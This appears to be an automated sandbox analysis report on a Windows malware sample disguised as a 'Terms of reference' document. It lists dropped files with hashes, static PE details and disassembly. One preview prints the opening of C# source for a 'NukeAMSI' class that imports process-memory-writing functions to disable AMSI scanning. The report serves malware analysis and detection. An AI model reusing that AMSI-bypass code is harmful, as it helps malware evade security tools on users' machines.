                                                                                                                                                                                      MD5:8128575292E1106BC77BB4AE1ABD205E
                                                                                                                                                                                      SHA1:8C354CF07335355E24A020F75DF58E0FFCE7F36E
                                                                                                                                                                                      SHA-256:8E883DF5DC15A14EECD200C9096B73196B621BA839C626240C9C36D854D917D8
                                                                                                                                                                                      SHA-512:6296C4D4EF18375AA249481FED056BDBE417916D4352348C4A62C7CCF76335291F00A92826F7D791E1A7039A58711FCD2FB0A6FB7B0D99D27977512D7A92C9F5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:L......g.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\xy2h0pkm\CSCB1F18608A6E140AA86CD9F6EC5A2C644.TMP....................Lsu.Y^.......X..........4.......C:\Users\user\AppData\Local\Temp\RES792.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.y.2.h.0.p.k.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_02deu0vu.ion.ps1

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2qaqmihi.pjk.ps1

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2vt2shfb.pwu.psm1

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_42vv2svh.bri.psm1

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f5bl1w5n.ca4.ps1

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n22vvcc4.mdr.ps1

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ovhjuhvi.tip.psm1

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_txgscq3q.kfo.ps1

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xvjt3fda.1u5.psm1

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhwkekmf.t4x.psm1

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\xy2h0pkm\CSCB1F18608A6E140AA86CD9F6EC5A2C644.TMP

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                      File Type:MSVC .res
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):652
                                                                                                                                                                                      Entropy (8bit):3.112567625336604
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry++Fak7Ynqq1+qPN5Dlq5J:+RI+ycuZhNvakSRPNnqX
                                                                                                                                                                                      MD5:E8004C7375D9595EC00FAAA293DDF958
                                                                                                                                                                                      SHA1:EE042DF2F38E1C5DAE077CE50D8E39E0EC42C743
                                                                                                                                                                                      SHA-256:D8E7EB86E76F1CA55A15CE91F50BEFFE106957170DA4AB9E435F33FD5FEC43AC
                                                                                                                                                                                      SHA-512:B0B542F76D9104EE7898D99F0E757B08FD25BD595A2C4E5D738C1444FC7CE14701CEA0692E1ED1C148FD68DEBA74006B41DF88DC495C3C82E71C6942AA4800A3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.y.2.h.0.p.k.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...x.y.2.h.0.p.k.m...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.0.cs

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2251
                                                                                                                                                                                      Entropy (8bit):5.037863634769049
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:JoOuOAXQbx7TBdBLMUgs94+gl+IC+YrI5IFfRW8:JoOgacG3U1cU8
                                                                                                                                                                                      MD5:2C374853E019C145F1168AD3528E727A
                                                                                                                                                                                      SHA1:7D0F43BF5FFBA8C166D450FF3096C77EB51B118E
                                                                                                                                                                                      SHA-256:87CF3574FF2F8C971698099C7AEBEA76E7DF657E063B384A07BD31DE28A5BDAF
                                                                                                                                                                                      SHA-512:4AEC3D17CB3D22212ED1E87C01144729FD49EA65963C75CF18876516140303956D3933D1044F13F33D2A551E5F7B61A084350A1A1E727FBA56F81763EFFC1DAE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;....public class NukeAMSI..{.. public const int PROCESS_VM_OPERATION = 0x0008;.. public const int PROCESS_VM_READ = 0x0010;.. public const int PROCESS_VM_WRITE = 0x0020;.. public const uint PAGE_EXECUTE_READWRITE = 0x40;.... // NtOpenProcess: Opens a handle to a process... [DllImport("ntdll.dll")].. public static extern int NtOpenProcess(out IntPtr ProcessHandle, uint DesiredAccess, [In] ref OBJECT_ATTRIBUTES ObjectAttributes, [In] ref CLIENT_ID ClientId);.... // NtWriteVirtualMemory: Writes to the memory of a process... [DllImport("ntdll.dll")].. public static extern int NtWriteVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] Buffer, uint NumberOfBytesToWrite, out uint NumberOfBytesWritten);.... // NtClose: Closes an open handle... [DllImport("ntdll.dll")].. public static extern int NtClose(IntPtr Handle);.... // LoadLibrary: Loads the specified mod

                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.cmdline

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):371
                                                                                                                                                                                      Entropy (8bit):5.298527197052455
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923f19B0zxs7+AEszI923f19b:p37Lvkmb6Kz99B0WZE299b
                                                                                                                                                                                      MD5:FC074B0B33654F2D7CB8996FC9C40642
                                                                                                                                                                                      SHA1:40E7348AB24E34F0D80D0A514FDC5E3B367B65B7
                                                                                                                                                                                      SHA-256:31C021DE67A5C3A5EC465BCA39BD887D345776FD00D6F68D0660021F9E642A49
                                                                                                                                                                                      SHA-512:02A5B2A1EA1A88DB4F30C741C605D07CA8557163F38918EF4F8BA88030EB98F2FA41229EDFD77CFDADF37501FA01FF91D170222122087B897262DE8FD42875D0
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.0.cs"

                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.dll

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4096
                                                                                                                                                                                      Entropy (8bit):3.6184614094443277
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:6TfOVuHIbGzo4QLXNJGhjRbd7lzm8DuJNL6+Y1ulva3jq:8OV/K2Ny7Jm++L9K
                                                                                                                                                                                      MD5:E7449CF261D6DAADBBEF212361658FB7
                                                                                                                                                                                      SHA1:6906B4B6DFE93CC1E40F3746A560542EE5430155
                                                                                                                                                                                      SHA-256:C1A68D0188CBE53883008C8420901DB2261D961E78E4F0D13413EF9306EC9A1E
                                                                                                                                                                                      SHA-512:F92DE0408A69522A590BBB1215174BA74AA52EF7E3A9E6CC8801E292730C8C8FDD1DA1FD57A96CCE834FB76CBF1C23F077721D364B2072C863C9D85E5C801A83
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................'... ...@....... ....................................@.................................8'..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p'......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~......0...#Strings....0.......#US.8.......#GUID...H.......#Blob...........W.........%3........................................................................L.E...S.E.................}.....}...............$................................... .............2.........V.]...V.r...V.....V...............Z.....Z...'.....2.Z...E.Z...^.Z...l.Z........ ..$.........

                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.out

                                                                                                                                                                                      Download File
                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
                                                                                                                                                                                      Category:modified
                                                                                                                                                                                      Size (bytes):872
                                                                                                                                                                                      Entropy (8bit):5.33106873014329
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:KMoId3ka6Kz99XE299aKax5DqBVKVrdFAMBJTH:dokka6a9xE29oK2DcVKdBJj
                                                                                                                                                                                      MD5:503EAA53B8A1E143E5B1FAD02345C990
                                                                                                                                                                                      SHA1:BF985F350BC686F04383C79AC288BE778A30C051
                                                                                                                                                                                      SHA-256:74DA0F374E3CE1F82316241D40EF04F15FC0B6B9E648B6021C9A823FFFBE63F2
                                                                                                                                                                                      SHA-512:C5A5ACA9CF57178A33B0C61F51D1232669D44DB7808AAF2EB71C4989A3D17984278959D722C8E70D0D20C4AC43F3200A48BF11A0986AD53F5565CC5A704CD1EC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                                                                                                      Static File Info

                                                                                                                                                                                      General

                                                                                                                                                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                      Entropy (8bit):7.828920939297905
                                                                                                                                                                                      TrID:
                                                                                                                                                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                      File name:Terms_of_reference_06_01_2025_samsung.scr.exe
                                                                                                                                                                                      File size:38'551'524 bytes
                                                                                                                                                                                      MD5:c364bcdca858dbb480e269b7c0c0dedc
                                                                                                                                                                                      SHA1:2251325091ef30f44e9bc716d995749a803f249e
                                                                                                                                                                                      SHA256:0e6e34d9db771d5f81f2329150f9b71498feeca06dd764c59a0a4b43b16eed18
                                                                                                                                                                                      SHA512:ec6d3b60a7427d542d1b9068663fc2efab603eed435c1b622126454e47b5b66f89ec5fb9956656afe3a74d3eccd9515f9fdc4397c6491e5df7aeca7dfda6c946
                                                                                                                                                                                      SSDEEP:786432:ibn84L7CLACWJv+ASDON6r8hp7jkHA46coubBERVkUieOR:ib84L7yu2ASy/7nozVEIlt
                                                                                                                                                                                      TLSH:65871256E2FD00D8E4BAC0B8C6575627EBB27455133097EB62608A692F33BE06F7D311
                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y..N8.DN8.DN8.DG@vDX8.D...EZ8.D...E\8.D...E.8.D>..EF8.D>..EC8.DN8.DF:.D]..E[8.D]..E.:.D]..EO8.D]..DO8.D]..EO8.DRichN8.D.......

                                                                                                                                                                                      File Icon

                                                                                                                                                                                      Icon Hash:0544801b6464f40b

                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                      General

                                                                                                                                                                                      Entrypoint:0x1405cfe90
                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                      Imagebase:0x140000000
                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                      Time Stamp:0x67115F21 [Thu Oct 17 19:01:53 2024 UTC]
                                                                                                                                                                                      TLS Callbacks:0x405cf310, 0x1, 0x405cfad0, 0x1
                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                      File Version Major:6
                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                      Import Hash:4b1892ce4fbcfcf064c6f69d693fc6a5

                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                      Instruction
                                                                                                                                                                                      dec eax
                                                                                                                                                                                      sub esp, 28h
                                                                                                                                                                                      call 00007F1794B8BEC8h
                                                                                                                                                                                      dec eax
                                                                                                                                                                                      add esp, 28h
                                                                                                                                                                                      jmp 00007F1794B8B80Fh
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      dec eax
                                                                                                                                                                                      sub esp, 28h
                                                                                                                                                                                      call 00007F179487A3A8h
                                                                                                                                                                                      jmp 00007F1794B8B9A4h
                                                                                                                                                                                      xor eax, eax
                                                                                                                                                                                      dec eax
                                                                                                                                                                                      add esp, 28h
                                                                                                                                                                                      ret
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      jmp 00007F1794B8B98Ch
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      dec eax
                                                                                                                                                                                      mov dword ptr [esp+10h], ebx
                                                                                                                                                                                      dec eax
                                                                                                                                                                                      mov dword ptr [esp+18h], esi
                                                                                                                                                                                      push ebp
                                                                                                                                                                                      push edi
                                                                                                                                                                                      inc ecx
                                                                                                                                                                                      push esi
                                                                                                                                                                                      dec eax
                                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                                      dec eax
                                                                                                                                                                                      sub esp, 10h
                                                                                                                                                                                      xor eax, eax
                                                                                                                                                                                      xor ecx, ecx
                                                                                                                                                                                      cpuid
                                                                                                                                                                                      inc esp
                                                                                                                                                                                      mov eax, ecx
                                                                                                                                                                                      inc esp
                                                                                                                                                                                      mov edx, edx
                                                                                                                                                                                      inc ecx
                                                                                                                                                                                      xor edx, 49656E69h
                                                                                                                                                                                      inc ecx
                                                                                                                                                                                      xor eax, 6C65746Eh
                                                                                                                                                                                      inc esp
                                                                                                                                                                                      mov ecx, ebx
                                                                                                                                                                                      inc esp
                                                                                                                                                                                      mov esi, eax
                                                                                                                                                                                      xor ecx, ecx
                                                                                                                                                                                      mov eax, 00000001h
                                                                                                                                                                                      cpuid
                                                                                                                                                                                      inc ebp
                                                                                                                                                                                      or edx, eax
                                                                                                                                                                                      mov dword ptr [ebp-10h], eax
                                                                                                                                                                                      inc ecx
                                                                                                                                                                                      xor ecx, 756E6547h
                                                                                                                                                                                      mov dword ptr [ebp-0Ch], ebx
                                                                                                                                                                                      inc ebp
                                                                                                                                                                                      or edx, ecx
                                                                                                                                                                                      mov dword ptr [ebp-08h], ecx
                                                                                                                                                                                      mov edi, ecx
                                                                                                                                                                                      mov dword ptr [ebp-04h], edx
                                                                                                                                                                                      jne 00007F1794B8B9FDh
                                                                                                                                                                                      dec eax
                                                                                                                                                                                      or dword ptr [001CA17Dh], FFFFFFFFh
                                                                                                                                                                                      and eax, 0FFF3FF0h
                                                                                                                                                                                      dec eax
                                                                                                                                                                                      mov dword ptr [001CA165h], 00008000h
                                                                                                                                                                                      cmp eax, 000106C0h
                                                                                                                                                                                      je 00007F1794B8B9CAh
                                                                                                                                                                                      cmp eax, 00020660h
                                                                                                                                                                                      je 00007F1794B8B9C3h
                                                                                                                                                                                      cmp eax, 00020670h
                                                                                                                                                                                      je 00007F1794B8B9BCh
